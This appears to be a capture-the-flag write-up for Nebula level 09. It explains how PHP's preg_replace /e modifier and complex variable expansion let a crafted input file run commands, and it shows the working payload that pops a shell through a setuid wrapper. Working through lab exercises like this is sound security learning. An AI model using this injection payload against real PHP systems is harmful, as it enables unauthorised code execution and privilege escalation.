Expanding of variables

         Nebula 09 Agenda: “There’s a C setuid wrapper for some vulnerable PHP code…”

In actual fact, when PHP string is specified in double quotes, variables are parsed within it. Furthermore, through the complex (allows usage of complex expressions) variable expansion, could be expanded even function call.

The available script’s options shows that we can pass two arguments($argv) into “markup” function. “$filename” is used to specify file argument of file_get_contents function. The second one, “$use_me“(the name says it all) is never used, so let’s fix it through passing to the print.

1 level09@nebula:~$ cat > /tmp/mail
2 [email {$use_me(sh)}]
3 level09@nebula:~$ /home/flag09/flag09 /tmp/mail system
4 PHP Notice:  Use of undefined constant sh - assumed 'sh' in 
5 /home/flag09/flag09.php(15) : regexp code on line 1
6 sh-4.2$ getflag
7 You have successfully executed getflag on a target account

A few more words to bring some light to the level source. We can see that preg_replace function is using the PREG_REPLACE_EVAL(“e”) pattern modifier which in our case allows the substitution of backreference (to the second captured subpattern “(.*)”) in the replacement string, evaluates it as PHP code (“spam” function), and uses the result for replacing the search string. Nevertheless, as mentioned above, the trick by itself happens when the string gets to the output. That’s it!